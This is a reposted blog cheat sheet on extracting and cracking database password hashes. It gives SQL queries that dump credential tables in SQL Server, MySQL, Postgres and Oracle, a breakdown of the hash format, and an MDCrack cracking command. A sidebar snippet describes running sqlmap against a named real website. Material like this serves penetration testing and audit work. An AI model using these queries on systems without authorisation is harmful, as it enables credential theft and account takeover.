Database Password Hashes Cracking

最新推荐文章于 2024-08-30 08:26:17 发布
最新推荐文章于 2024-08-30 08:26:17 发布
阅读量558 收藏
点赞数
分类专栏: Datebase 文章标签: database mysql authentication dictionary header algorithm

作者:sid

 

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa' 

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

 

0×0100- constant header

34767D5C- salt

0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash

crack the upper case hash in 'cain and abel' and then work the case sentive hash

 

 

SQL server 2005:-

SELECT password_hash FROM sys.sql_logins where name='sa'

0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

0×0100- constant header

993BF231-salt

5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash

crack case sensitive hash in cain, try brute force and dictionary based attacks.

 

update:- following bernardo's comments:-

use function fn_varbintohexstr() to cast password in a hex string. 

e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins 

 

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

 

*mysql  < 4.1

 

mysql> SELECT PASSWORD('mypass');

+——————–+

| PASSWORD('mypass') |

+——————–+

| 6f8c114b58f2ce9e   |

+——————–+

 

*mysql >=4.1

 

mysql> SELECT PASSWORD('mypass');

+——————————————-+

| PASSWORD('mypass')                        |

+——————————————-+

| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |

+——————————————-+

 

Select user, password from mysql.user

The hashes can be cracked in 'cain and abel' 

 

Postgres:-

Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called "postgres" or "pgsql")

select usename, passwd from pg_shadow;

     usename      |  passwd                

——————+————————————- 

testuser            | md5fabb6d7172aadfda4753bf0507ed4396

use mdcrack to crack these hashes:-

$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

 

Oracle:-

 

select name, password, spare4 from sys.user$

hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g

More on Oracle later, i am a bit bored…. 

References/Copied from:-

http://hkashfi.blogspot.com/2007/08/breaking-sql-server-2005-hashes.html

http://dev.mysql.com/doc/refman/5.0/en/password-hashing.html

http://pentestmonkey.net/blog/cracking-postgres-hashes/

http://freeworld.thc.org/thc-orakelcrackert11g/

 
lizhenyuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
postgresql读写文件和破解密码
Coisini的博客
06-09 1640
1.通过copy读文件 mickey@pentest:~/Pentest/crack/mdcrack$ psql -h 127.0.0.1 -U postgres 用户 postgres 密码: psql (8.4.2) SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256) Type “help” for help. postgres=# ...
通过sqlnamp检测sql注入漏洞
diexingtao9618的博客
09-16 1164
通过sqlnamp检测sql注入漏洞 1 sql注入概述并安装SQLmap漏洞查看工具 2 安装渗透测试演练系统DVWA 3 实战-使用SQLmap进行sql注入并获得后台管理员adnim帐号和密码 注: 网页最好不要使用GET方式提交,GET是明文方式进行提交,应该使用POST方式进行提交。 1.1 sql注入概述 所谓SQL注入,就是通过把SQL命令插入到...
理解database cracking
漫步量化
03-30 388
Overview 哈,完全不知道这个概念。 database cracking MonetDB was one of the first database to introduce Database Cracking. Database Cracking is an incremental partial indexing and/or sorting of the data. It directly exploits the columnar nature of MonetDB. Cracking..
Tryhackme-Crack The Hash
个人博客
09-18 1645
Crack The Hash 文章目录Crack The HashCrack the hashTask1 Level 1Task2Crack The Hash Level 2Task1 **Info** IntroductionTask2 **Walkthrough** Hash identificationTask3 **Walkthrough** WordlistsTask4 **Walkthrough** Cracking tools, modes & rulesTask5 **Walkthr
thc-orakelcrackert11g
cnbird's blog
11-02 909
OrakelCrackert is an Oracle 11g database password hash cracker using a weakness in the Oracle password storage strategy. With Oracle 11g, case sensitive SHA1 based hashing is introduced. Storing passw
Oracle之数据库安全
weixin_34060299的博客
02-06 248
密码破解,大部分其实是通过枚举的方式,列出可能的密码,然后逐个尝试,直到找到真正的密码,有时也叫暴力破解。接下来,我们将举几个密码破解的例子。 n  密码破解例1--- OrakelCrackert 实验环境:Oracle 11g (Linux) 从数据字典中获得要破解的用户信息,本例中的要破解的用户是ZZ2。 1)         得到账户信息 SQL&gt; select na...
SQL注入之实践--初试小刀
热门推荐
jiangliuzheng的专栏
07-11 1万+
1、sql注入的原理 sql注入是针对web客户端在提交数据时未对用户数据进行过滤,导致用户的特殊字符在数据库里被执行而导致的高危漏洞,恶意的可以删除整个数据库,提权到服务器挂马等。 一般acess数据库没有过滤的话直接暴库,但是不能提权哦,比较喜欢的还是mysql、sqlserver,可以提权,进行挂马等操作。之前在google上搜了一大堆具有sql injured的网站,今天就找一两个细致
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 7961
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
vbscript 加密函数_VBScript的简单可逆加密
cunchi8090的博客
07-22 1066
vbscript 加密函数It seems these days I’m writing a lot of VBScript scripts. My scripts are often interacting with a MySQL database but could be doing other things as well, such as connecting to workstatio...
如何检测用户是否存在弱口令的现象?
JackTian
07-25 1万+
如何检测用户是否存在弱口令的现象? 在现互联网环境下,工作中避免不了会考虑服务器的安全问题,那么对于简单的口令来说,则是服务器所面临的最大风险。即便大家都会有这方面的安全意识,设置一个符合长度且复杂性的口令会更加安全,但总是会有一些用户因贪图方便而采用简单且易记的口令。 那么对于任何一个承担着安全责任的管理员来说,通过某种手段来更高效的找出那些弱口令用户是非常重要的,就是今天我所推荐的弱口令检测工...
John the ripper破解Linux密码
weixin_51387754的博客
05-04 2823
一.John 在linux系统上创建一个名为happy的新用户,其密码为123 (kali㉿kali)-[~] └─$ su root Password: ┌──(root????kali)-[/home/kali] └─# adduser happy Adding user `happy' ... Adding new group `happy' (1001) ... Adding new user `happy' (1001)
linux基本命令
weixin_48937614的博客
06-25 298
1:系统账号清理 [root@localhost ~]# useradd zhangsan [root@localhost ~]# passwd zhangsan [root@localhost ~]# grep “/sbin/nologin$” /etc/passwd [root@localhost ~]# usermod -L zhangsan [root@localhost ~]# passwd -S zhangsan   ##查看账号状态 zhangsan LK 2015-12
如何使用John Ripper增量模式破解密码
cunjiu9486的博客
10-08 1482
This is the most powerful cracking mode. Keep in mind that generally cracking will never end in this mode if there is no password because combinations are too large. 这是最强大的破解模式。 请记住,如果没有密码,因为组合太大,破解通常...
Linux系统安全--弱口令检测 John the Ripper
u012967763的专栏
01-15 740
1、下载John the Ripper [root@VM_0_11_centos Jone]# rm -rf *.tar.gz [root@VM_0_11_centos Jone]# wget http://www.openwall.com/john/j/john-1.8.0.tar.gz --2020-01-14 09:50:54-- http://www.openwall.com/j...
Linux服务器的弱口令检测及端口扫描
看清所以看轻
07-21 1075
一、弱口令检测——John the Ripper John the Ripper工具可以帮助我们扫描出系统中密码安全性较低的用户,并将扫描后的结果显示出来。 1、安装John the Ripper: John the Ripper的源码包提取地址: https://pan.baidu.com/s/117J0GZ9moOHfUr-JAuOmug 提取码:n76p 也可从官网直接下载: https:/...
常用的文件系统、存储类型小整理
Hehuyi_In的博客
02-07 3390
最近接触到了五花八门的文件系统、存储类型,名词听得头大,趁假期整理学习一番~
MySQL——事务与存储过程(一)事务管理(3)事务的回滚
最新发布
PAP
08-30 262
MySQL——事务与存储过程(一)事务管理(3)事务的回滚
mysql-day02
m0_64370841的博客
08-29 1311
【代码】mysql-day02。
john the ripper在windows系统中出现如下错误:Using default input encoding: UTF-8 No password hashes loaded (see FAQ),该怎么解决
07-15
对于 "john the ripper" 在 Windows 系统中出现的错误 "Using default input encoding: UTF-8 No password hashes loaded (see FAQ)",这通常是因为没有正确加载密码哈希文件导致的。以下是一些可能的解决方法: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值